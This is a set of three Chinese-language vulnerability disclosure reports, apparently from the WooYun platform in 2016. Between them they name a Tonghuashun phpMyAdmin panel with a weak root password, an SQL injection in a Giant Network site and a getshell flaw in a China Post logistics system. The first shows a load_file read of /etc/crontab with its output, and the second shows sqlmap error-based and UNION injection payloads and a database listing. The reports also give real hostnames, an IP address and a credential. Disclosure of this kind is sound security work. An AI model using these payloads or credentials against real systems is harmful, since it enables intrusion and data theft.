漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：同花顺某phpMyAdmin存在root弱口令详细说明：http://183.131.12.139:81/phpmyadmin/root123456/hxapp/hqserver/ 同花顺行情服务器的标志漏洞证明：select load_file('/etc/crontab');code 区域SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1 */3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul */1 * * * * root sh /home/l2log/update_log.sh > /dev/nul */1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul 00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1 ##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1 */1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1 ##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul #* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1 #00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null 00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul */5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul #*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&1 59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am #*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1 ##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null ##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null #45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045 ##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh #*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh * * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh */5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh 00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh */5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1 */30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null 00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-04-28 15:35厂商回复：你好，漏洞已经确认，正在进行处理，谢谢。最新状态：暂无

漏洞详情披露状态： 2016-05-02： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述：巨人网络某站静态注入（报错）详细说明：http://act.vg.ztgame.com/live/public/newsinfo/36 漏洞证明： code 区域sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://act.vg.ztgame.com:80/live/public/newsinfo/36 AND (SELECT 1271 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(1271=1271,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 1242=1242 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: http://act.vg.ztgame.com:80/live/public/newsinfo/-4099 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b7171,0x73596b79536f736a7754,0x7170766a71),NULL,NULL# --- [08:44:22] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0 [08:44:22] [INFO] fetching database names [08:44:22] [INFO] the SQL query used returns 3 entries [08:44:22] [INFO] resumed: information_schema [08:44:22] [INFO] resumed: act_vg [08:44:22] [INFO] resumed: test available databases [3]: [*] act_vg [*] information_schema [*] test 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-03 15:37厂商回复：感谢路人甲提交漏洞最新状态：暂无

漏洞详情披露状态： 2016-04-24： 细节已通知厂商并且等待厂商处理中2016-04-24： 厂商已经确认，细节仅向厂商公开2016-05-04： 细节向核心白帽子及相关领域专家公开2016-05-14： 细节向普通白帽子公开2016-05-24： 细节向实习白帽子公开2016-06-08： 细节向公众公开简要描述：11详细说明：中国邮政物流某系统漏洞可Getshell（泄露服务器文件/运单信息/收货地址/客户联系方式大量信息）.地址：http://www.jscpel.com:9090/JSCNPL_TMS_TEST/login.action    漏洞证明：可Getshell（泄露服务器文件/运单信息/收货地址/客户联系方式大量信息）.           修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-04-24 19:41厂商回复：谢谢。最新状态：暂无